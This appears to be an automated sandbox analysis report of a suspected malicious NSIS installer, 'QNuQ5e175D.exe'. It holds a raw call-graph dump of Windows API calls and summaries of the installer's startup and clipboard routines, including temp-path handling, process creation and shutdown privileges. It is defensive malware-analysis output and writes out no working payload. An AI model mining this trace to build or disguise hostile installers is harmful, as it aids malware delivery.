5563->5564 5565 4068d4 2 API calls 5564->5565 5566 40169b 5565->5566 5567 402b10 5568 402da9 21 API calls 5567->5568 5569 402b16 5568->5569 5570 4065b4 21 API calls 5569->5570 5571 402953 5569->5571 5570->5571 4117 402711 4118 402da9 21 API calls 4117->4118 4126 402720 4118->4126 4119 40285d 4120 40276a ReadFile 4120->4119 4120->4126 4122 402803 4122->4119 4122->4126 4131 406148 SetFilePointer 4122->4131 4124 4027aa MultiByteToWideChar 4124->4126 4125 40285f 4142 4064be wsprintfW 4125->4142 4126->4119 4126->4120 4126->4122 4126->4124 4126->4125 4128 4027d0 SetFilePointer MultiByteToWideChar 4126->4128 4129 402870 4126->4129 4140 4060ea ReadFile 4126->4140 4128->4126 4129->4119 4130 402891 SetFilePointer 4129->4130 4130->4119 4132 40617c 4131->4132 4133 406164 4131->4133 4132->4122 4134 4060ea ReadFile 4133->4134 4135 406170 4134->4135 4135->4132 4136 406185 SetFilePointer 4135->4136 4137 4061ad SetFilePointer 4135->4137 4136->4137 4138 406190 4136->4138 4137->4132 4143 406119 WriteFile 4138->4143 4141 406108 4140->4141 4141->4126 4142->4119 4144 406137 4143->4144 4144->4132 5572 401491 5573 4055fc 28 API calls 5572->5573 5574 401498 5573->5574 4547 401794 4548 402dcb 21 API calls 4547->4548 4549 40179b 4548->4549 4550 4017c3 4549->4550 4551 4017bb 4549->4551 4588 406577 lstrcpynW 4550->4588 4587 406577 lstrcpynW 4551->4587 4554 4017c1 4558 406825 5 API calls 4554->4558 4555 4017ce 4556 405e46 3 API calls 4555->4556 4557 4017d4 lstrcatW 4556->4557 4557->4554 4564 4017e0 4558->4564 4559 4068d4 2 API calls 4559->4564 4560 40181c 4561 406042 2 API calls 4560->4561 4561->4564 4563 4017f2 CompareFileTime 4563->4564 4564->4559 4564->4560 4564->4563 4565 4018b2 4564->4565 4569 406577 lstrcpynW 4564->4569 4573 4065b4 21 API calls 4564->4573 4580 405bd7 MessageBoxIndirectW 4564->4580 4585 401889 4564->4585 4586 406067 GetFileAttributesW CreateFileW 4564->4586 4566 4055fc 28 API calls 4565->4566 4567 4018bc 4566->4567 4570 4032d9 35 API calls 4567->4570 4568 4055fc 28 API calls 4583 40189e 4568->4583 4569->4564 4572 4018cf 4570->4572 4571 4018e3 SetFileTime 4574 4018f5 CloseHandle 4571->4574 4572->4571 4572->4574 4573->4564 4575 401906 4574->4575 4574->4583 4576 40190b 4575->4576 4577 40191e 4575->4577 4578 4065b4 21 API calls 4576->4578 4579 4065b4 21 API calls 4577->4579 4581 401913 lstrcatW 4578->4581 4582 401926 4579->4582 4580->4564 4581->4582 4582->4583 4584 405bd7 MessageBoxIndirectW 4582->4584 4584->4583 4585->4568 4585->4583 4586->4564 4587->4554 4588->4555 5575 401a97 5576 402da9 21 API calls 5575->5576 5577 401aa0 5576->5577 5578 402da9 21 API calls 5577->5578 5579 401a45 5578->5579 4594 401598 4595 4015b1 4594->4595 4596 4015a8 ShowWindow 4594->4596 4597 4015bf ShowWindow 4595->4597 4598 402c4f 4595->4598 4596->4595 4597->4598 4630 402419 4631 402dcb 21 API calls 4630->4631 4632 402428 4631->4632 4633 402dcb 21 API calls 4632->4633 4634 402431 4633->4634 4635 402dcb 21 API calls 4634->4635 4636 40243b GetPrivateProfileStringW 4635->4636 5580 40201b 5581 402dcb 21 API calls 5580->5581 5582 402022 5581->5582 5583 4068d4 2 API calls 5582->5583 5584 402028 5583->5584 5586 402039 5584->5586 5587 4064be wsprintfW 5584->5587 5587->5586 5588 401b9c 5589 402dcb 21 API calls 5588->5589 5590 401ba3 5589->5590 5591 402da9 21 API calls 5590->5591 5592 401bac wsprintfW 5591->5592 5593 402c4f 5592->5593 4637 405b9d ShellExecuteExW 5594 40149e 5595 4023c2 5594->5595 5596 4014ac PostQuitMessage 5594->5596 5596->5595 4638 4016a0 4639 402dcb 21 API calls 4638->4639 4640 4016a7 4639->4640 4641 402dcb 21 API calls 4640->4641 4642 4016b0 4641->4642 4643 402dcb 21 API calls 4642->4643 4644 4016b9 MoveFileW 4643->4644 4645 4016cc 4644->4645 4646 4016c5 4644->4646 4647 4068d4 2 API calls 4645->4647 4650 40231b 4645->4650 4652 401423 4646->4652 4649 4016db 4647->4649 4649->4650 4651 406337 40 API calls 4649->4651 4651->4646 4653 4055fc 28 API calls 4652->4653 4654 401431 4653->4654 4654->4650 5597 4049a0 5598 4049b0 5597->5598 5599 4049d6 5597->5599 5600 4044f6 22 API calls 5598->5600 5601 40455d 8 API calls 5599->5601 5602 4049bd SetDlgItemTextW 5600->5602 5603 4049e2 5601->5603 5602->5599 4655 402324 4656 402dcb 21 API calls 4655->4656 4657 40232a 4656->4657 4658 402dcb 21 API calls 4657->4658 4659 402333 4658->4659 4660 402dcb 21 API calls 4659->4660 4661 40233c 4660->4661 4662 4068d4 2 API calls 4661->4662 4663 402345 4662->4663 4664 402356 lstrlenW lstrlenW 4663->4664 4665 402349 4663->4665 4667 4055fc 28 API calls 4664->4667 4666 4055fc 28 API calls 4665->4666 4669 402351 4665->4669 4666->4669 4668 402394 SHFileOperationW 4667->4668 4668->4665 4668->4669 5604 401a24 5605 402dcb 21 API calls 5604->5605 5606 401a2b 5605->5606 5607 402dcb 21 API calls 5606->5607 5608 401a34 5607->5608 5609 401a3b lstrcmpiW 5608->5609 5610 401a4d lstrcmpW 5608->5610 5611 401a41 5609->5611 5610->5611 5612 401da6 5613 401db9 GetDlgItem 5612->5613 5614 401dac 5612->5614 5616 401db3 5613->5616 5615 402da9 21 API calls 5614->5615 5615->5616 5618 402dcb 21 API calls 5616->5618 5620 401dfa GetClientRect LoadImageW SendMessageW 5616->5620 5618->5620 5619 401e58 5621 401e5d DeleteObject 5619->5621 5622 401e64 5619->5622 5620->5619 5620->5622 5621->5622 5623 4023a8 5624 4023af 5623->5624 5627 4023c2 5623->5627 5625 4065b4 21 API calls 5624->5625 5626 4023bc 5625->5626 5626->5627 5628 405bd7 MessageBoxIndirectW 5626->5628 5628->5627 5629 402c2a SendMessageW 5630 402c44 InvalidateRect 5629->5630 5631 402c4f 5629->5631 5630->5631 5632 40462c lstrcpynW lstrlenW 4696 4024af 4697 402dcb 21 API calls 4696->4697 4698 4024c1 4697->4698 4699 402dcb 21 API calls 4698->4699 4700 4024cb 4699->4700 4713 402e5b 4700->4713 4703 402dcb 21 API calls 4707 4024f9 lstrlenW 4703->4707 4704 402503 4705 40250f 4704->4705 4708 402da9 21 API calls 4704->4708 4709 40252e RegSetValueExW 4705->4709 4710 4032d9 35 API calls 4705->4710 4706 402c4f 4707->4704 4708->4705 4711 402544 RegCloseKey 4709->4711 4710->4709 4711->4706 4714 402e76 4713->4714 4717 406412 4714->4717 4718 406421 4717->4718 4719 4024db 4718->4719 4720 40642c RegCreateKeyExW 4718->4720 4719->4703 4719->4704 4719->4706 4720->4719 5633 402930 5634 402dcb 21 API calls 5633->5634 5635 402937 FindFirstFileW 5634->5635 5636 40295f 5635->5636 5640 40294a 5635->5640 5637 402968 5636->5637 5641 4064be wsprintfW 5636->5641 5642 406577 lstrcpynW 5637->5642 5641->5637 5642->5640 5643 401931 5644 401968 5643->5644 5645 402dcb 21 API calls 5644->5645 5646 40196d 5645->5646 5647 405c83 71 API calls 5646->5647 5648 401976 5647->5648 5649 401934 5650 402dcb 21 API calls 5649->5650 5651 40193b 5650->5651 5652 405bd7 MessageBoxIndirectW 5651->5652 5653 401944 5652->5653 5654 4046b5 5655 4047e7 5654->5655 5656 4046cd 5654->5656 5657 404851 5655->5657 5659 40491b 5655->5659 5665 404822 GetDlgItem SendMessageW 5655->5665 5662 4044f6 22 API calls 5656->5662 5658 40485b GetDlgItem 5657->5658 5657->5659 5660 404875 5658->5660 5661 4048dc 5658->5661 5664 40455d 8 API calls 5659->5664 5660->5661 5668 40489b SendMessageW LoadCursorW SetCursor 5660->5668 5661->5659 5669 4048ee 5661->5669 5663 404734 5662->5663 5666 4044f6 22 API calls 5663->5666 5667 404916 5664->5667 5687 404518 KiUserCallbackDispatcher 5665->5687 5671 404741 CheckDlgButton 5666->5671 5688 404964 5668->5688 5673 404904 5669->5673 5674 4048f4 SendMessageW 5669->5674 5685 404518 KiUserCallbackDispatcher 5671->5685 5673->5667 5679 40490a SendMessageW 5673->5679 5674->5673 5675 40484c 5676 404940 SendMessageW 5675->5676 5676->5657 5679->5667 5680 40475f GetDlgItem 5686 40452b SendMessageW 5680->5686 5682 404775 SendMessageW 5683 404792 GetSysColor 5682->5683 5684 40479b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5682->5684 5683->5684 5684->5667 5685->5680 5686->5682 5687->5675 5691 405b9d ShellExecuteExW 5688->5691 5690 4048ca LoadCursorW SetCursor 5690->5661 5691->5690 4721 4028b6 4722 4028bd 4721->4722 4723 402bce 4721->4723 4724 402da9 21 API calls 4722->4724 4725 4028c4 4724->4725 4726 4028d3 SetFilePointer 4725->4726 4726->4723 4727 4028e3 4726->4727 4729 4064be wsprintfW 4727->4729 4729->4723 5692 401f37 5693 402dcb 21 API calls 5692->5693 5694 401f3d 5693->5694 5695 402dcb 21 API calls 5694->5695 5696 401f46 5695->5696 5697 402dcb 21 API calls 5696->5697 5698 401f4f 5697->5698 5699 402dcb 21 API calls 5698->5699 5700 401f58 5699->5700 5701 401423 28 API calls 5700->5701 5702 401f5f 5701->5702 5709 405b9d ShellExecuteExW 5702->5709 5704 401fa7 5705 406a16 5 API calls 5704->5705 5707 402953 5704->5707 5706 401fc4 CloseHandle 5705->5706 5706->5707 5709->5704 5710 4014b8 5711 4014be 5710->5711 5712 401389 2 API calls 5711->5712 5713 4014c6 5712->5713 5714 402fb8 5715 402fe3 5714->5715 5716 402fca SetTimer 5714->5716 5717 403038 5715->5717 5718 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5715->5718 5716->5715 5718->5717 5719 6fc4103d 5720 6fc4101b 5 API calls 5719->5720 5721 6fc41056 5720->5721 4829 40573b 4830 4058e5 4829->4830 4831 40575c GetDlgItem GetDlgItem GetDlgItem 4829->4831 4833 4058ee GetDlgItem CreateThread CloseHandle 4830->4833 4835 405916 4830->4835 4875 40452b SendMessageW 4831->4875 4833->4835 4878 4056cf 5 API calls 4833->4878 4834 405941 4838 4059a1 4834->4838 4839 40594d 4834->4839 4835->4834 4836 405966 4835->4836 4837 40592d ShowWindow ShowWindow 4835->4837 4844 40455d 8 API calls 4836->4844 4877 40452b SendMessageW 4837->4877 4838->4836 4846 4059af SendMessageW 4838->4846 4842 405955 4839->4842 4843 40597b ShowWindow 4839->4843 4840 4057cc 4845 4057d3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4840->4845 4847 4044cf SendMessageW 4842->4847 4849 40599b 4843->4849 4850 40598d 4843->4850 4848 405974 4844->4848 4851 405841 4845->4851 4852 405825 SendMessageW SendMessageW 4845->4852 4846->4848 4853 4059c8 CreatePopupMenu 4846->4853 4847->4836 4857 4044cf SendMessageW 4849->4857 4856 4055fc 28 API calls 4850->4856 4854 405854 4851->4854 4855 405846 SendMessageW 4851->4855 4852->4851 4858 4065b4 21 API calls 4853->4858 4859 4044f6 22 API calls 4854->4859 4855->4854 4856->4849 4857->4838 4860 4059d8 AppendMenuW 4858->4860 4861 405864 4859->4861 4862 4059f5 GetWindowRect 4860->4862 4863 405a08 TrackPopupMenu 4860->4863 4864 4058a1 GetDlgItem SendMessageW 4861->4864 4865 40586d ShowWindow 4861->4865 4862->4863 4863->4848 4866 405a23 4863->4866 4864->4848 4869 4058c8 SendMessageW SendMessageW 4864->4869 4867 405890 4865->4867 4868 405883 ShowWindow 4865->4868 4870 405a3f SendMessageW 4866->4870 4876 40452b SendMessageW 4867->4876 4868->4867 4869->4848 4870->4870 4871 405a5c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4870->4871 4873 405a81 SendMessageW 4871->4873 4873->4873 4874 405aaa GlobalUnlock SetClipboardData CloseClipboard 4873->4874 4874->4848 4875->4840 4876->4864 4877->4834 5722 401d3c 5723 402da9 21 API calls 5722->5723 5724 401d42 IsWindow 5723->5724 5725 401a45 5724->5725 5726 404d3d 5727 404d69 5726->5727 5728 404d4d 5726->5728 5730 404d9c 5727->5730 5731 404d6f SHGetPathFromIDListW 5727->5731 5737 405bbb GetDlgItemTextW 5728->5737 5733 404d86 SendMessageW 5731->5733 5734 404d7f 5731->5734 5732 404d5a SendMessageW 5732->5727 5733->5730 5735 40140b 2 API calls 5734->5735 5735->5733 5737->5732

                                                          Executed Functions

                                                          Function 00403552 Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464stringfilecomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 403552-4035a4 SetErrorMode GetVersionExW 1 4035a6-4035d6 GetVersionExW 0->1 2 4035de-4035e3 0->2 1->2 3 4035e5 2->3 4 4035eb-40362d 2->4 3->4 5 403640 4->5 6 40362f-403637 call 40696b 4->6 7 403645-403659 call 4068fb lstrlenA 5->7 6->5 11 403639 6->11 13 40365b-403677 call 40696b * 3 7->13 11->5 20 403688-4036ec #17 OleInitialize SHGetFileInfoW call 406577 GetCommandLineW call 406577 13->20 21 403679-40367f 13->21 28 4036f5-403709 call 405e73 CharNextW 20->28 29 4036ee-4036f0 20->29 21->20 25 403681 21->25 25->20 32 403804-40380a 28->32 29->28 33 403810 32->33 34 40370e-403714 32->34 35 403824-40383e GetTempPathW call 403521 33->35 36 403716-40371b 34->36 37 40371d-403724 34->37 46 403840-40385e GetWindowsDirectoryW lstrcatW call 403521 35->46 47 403896-4038b0 DeleteFileW call 4030a2 35->47 36->36 36->37 39 403726-40372b 37->39 40 40372c-403730 37->40 39->40 41 4037f1-403800 call 405e73 40->41 42 403736-40373c 40->42 41->32 61 403802-403803 41->61 44 403756-40378f 42->44 45 40373e-403745 42->45 51 403791-403796 44->51 52 4037ac-4037e6 44->52 49 403747-40374a 45->49 50 40374c 45->50 46->47 66 403860-403890 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403521 46->66 62 4038b6-4038bc 47->62 63 403a9d-403aad call 403b6f OleUninitialize 47->63 49->44 49->50 50->44 51->52 56 403798-4037a0 51->56 58 4037e8-4037ec 52->58 59 4037ee-4037f0 52->59 64 4037a2-4037a5 56->64 65 4037a7 56->65 58->59 67 403812-40381f call 406577 58->67 59->41 61->32 68 4038c2-4038cd call 405e73 62->68 69 403955-40395c call 403c49 62->69 77 403ad3-403ad9 63->77 78 403aaf-403abf call 405bd7 ExitProcess 63->78 64->52 64->65 65->52 66->47 66->63 67->35 82 40391b-403925 68->82 83 4038cf-403904 68->83 80 403961-403965 69->80 84 403b57-403b5f 77->84 85 403adb-403af1 GetCurrentProcess OpenProcessToken 77->85 80->63 92 403927-403935 call 405f4e 82->92 93 40396a-403990 call 405b42 lstrlenW call 406577 82->93 89 403906-40390a 83->89 86 403b61 84->86 87 403b65-403b69 ExitProcess 84->87 90 403af3-403b21 LookupPrivilegeValueW AdjustTokenPrivileges 85->90 91 403b27-403b35 call 40696b 85->91 86->87 94 403913-403917 89->94 95 40390c-403911 89->95 90->91 104 403b43-403b4e ExitWindowsEx 91->104 105 403b37-403b41 91->105 92->63 106 40393b-403951 call 406577 * 2 92->106 110 4039a1-4039b9 93->110 111 403992-40399c call 406577 93->111 94->89 99 403919 94->99 95->94 95->99 99->82 104->84 108 403b50-403b52 call 40140b 104->108 105->104 105->108 106->69 108->84 117 4039be-4039c2 110->117 111->110 119 4039c7-4039f1 wsprintfW call 4065b4 117->119 122 4039f3-4039f8 call 405acb 119->122 123 4039fa call 405b25 119->123 127 4039ff-403a01 122->127 123->127 128 403a03-403a0d GetFileAttributesW 127->128 129 403a3d-403a5c SetCurrentDirectoryW call 406337 CopyFileW 127->129 130 403a2e-403a39 128->130 131 403a0f-403a18 DeleteFileW 128->131 136 403a9b 129->136 137 403a5e-403a7f call 406337 call 4065b4 call 405b5a 129->137 130->117 135 403a3b 130->135 131->130 134 403a1a-403a2c call 405c83 131->134 134->119 134->130 135->63 136->63 146 403a81-403a8b 137->146 147 403ac5-403ad1 CloseHandle 137->147 146->136 148 403a8d-403a95 call 4068d4 146->148 147->136 148->119 148->136
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403575
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004035A0
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004035B3
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040364C
                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403689
                                                          • OleInitialize.OLE32(00000000), ref: 00403690
                                                          • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 004036AF
                                                          • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036C4
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000020,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036FD
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403835
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403852
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403866
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040386E
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387F
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403887
                                                          • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040389B
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403974
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • wsprintfW.USER32 ref: 004039D1
                                                          • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 00403A04
                                                          • DeleteFileW.KERNEL32(00437800), ref: 00403A10
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A3E
                                                            • Part of subcall function 00406337: MoveFileExW.KERNEL32(?,?,00000005,00405E35,?,00000000,000000F1,?,?,?,?,?), ref: 00406341
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\QNuQ5e175D.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A54
                                                            • Part of subcall function 00405B5A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                            • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                            • Part of subcall function 004068D4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                            • Part of subcall function 004068D4: FindClose.KERNELBASE(00000000), ref: 004068EB
                                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AA2
                                                          • ExitProcess.KERNEL32 ref: 00403ABF
                                                          • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AC6
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AE2
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AE9
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AFE
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B21
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B46
                                                          • ExitProcess.KERNEL32 ref: 00403B69
                                                            • Part of subcall function 00405B25: CreateDirectoryW.KERNELBASE(?,00000000,00403545,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$C:\Users\user\Desktop$C:\Users\user\Desktop\QNuQ5e175D.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                          • API String ID: 1813718867-2653512062
                                                          • Opcode ID: 3bbf329214e6d57898fd1087eec31c3cd4d4deec240645a0aaa836412135d51f
                                                          • Instruction ID: 854c728f01c0035939758d15b123b9002cb8995d15bf2fdbd915a0a46deb4321
                                                          • Opcode Fuzzy Hash: 3bbf329214e6d57898fd1087eec31c3cd4d4deec240645a0aaa836412135d51f
                                                          • Instruction Fuzzy Hash: 6DF1F470604301ABD320AF659D05B6B7EE8EB8570AF10483FF581B22D1DB7DDA458B6E
                                                          Function 0040573B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 151 40573b-405756 152 4058e5-4058ec 151->152 153 40575c-405823 GetDlgItem * 3 call 40452b call 404e84 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 405916-405923 152->155 156 4058ee-405910 GetDlgItem CreateThread CloseHandle 152->156 176 405841-405844 153->176 177 405825-40583f SendMessageW * 2 153->177 158 405941-40594b 155->158 159 405925-40592b 155->159 156->155 162 4059a1-4059a5 158->162 163 40594d-405953 158->163 160 405966-40596f call 40455d 159->160 161 40592d-40593c ShowWindow * 2 call 40452b 159->161 173 405974-405978 160->173 161->158 162->160 170 4059a7-4059ad 162->170 166 405955-405961 call 4044cf 163->166 167 40597b-40598b ShowWindow 163->167 166->160 174 40599b-40599c call 4044cf 167->174 175 40598d-405996 call 4055fc 167->175 170->160 171 4059af-4059c2 SendMessageW 170->171 178 405ac4-405ac6 171->178 179 4059c8-4059f3 CreatePopupMenu call 4065b4 AppendMenuW 171->179 174->162 175->174 180 405854-40586b call 4044f6 176->180 181 405846-405852 SendMessageW 176->181 177->176 178->173 188 4059f5-405a05 GetWindowRect 179->188 189 405a08-405a1d TrackPopupMenu 179->189 190 4058a1-4058c2 GetDlgItem SendMessageW 180->190 191 40586d-405881 ShowWindow 180->191 181->180 188->189 189->178 192 405a23-405a3a 189->192 190->178 195 4058c8-4058e0 SendMessageW * 2 190->195 193 405890 191->193 194 405883-40588e ShowWindow 191->194 196 405a3f-405a5a SendMessageW 192->196 197 405896-40589c call 40452b 193->197 194->197 195->178 196->196 198 405a5c-405a7f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->190 200 405a81-405aa8 SendMessageW 198->200 200->200 201 405aaa-405abe GlobalUnlock SetClipboardData CloseClipboard 200->201 201->178
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405799
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004057A8
                                                          • GetClientRect.USER32(?,?), ref: 004057E5
                                                          • GetSystemMetrics.USER32(00000002), ref: 004057EC
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040580D
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040581E
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405831
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040583F
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405852
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405874
                                                          • ShowWindow.USER32(?,00000008), ref: 00405888
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058A9
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004058B9
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058D2
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058DE
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004057B7
                                                            • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058FB
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000056CF,00000000), ref: 00405909
                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405910
                                                          • ShowWindow.USER32(00000000), ref: 00405934
                                                          • ShowWindow.USER32(?,00000008), ref: 00405939
                                                          • ShowWindow.USER32(00000008), ref: 00405983
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004059B7
                                                          • CreatePopupMenu.USER32 ref: 004059C8
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059DC
                                                          • GetWindowRect.USER32(?,?), ref: 004059FC
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405A15
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4D
                                                          • OpenClipboard.USER32(00000000), ref: 00405A5D
                                                          • EmptyClipboard.USER32 ref: 00405A63
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A6F
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405A79
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A8D
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405AAD
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405AB8
                                                          • CloseClipboard.USER32 ref: 00405ABE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
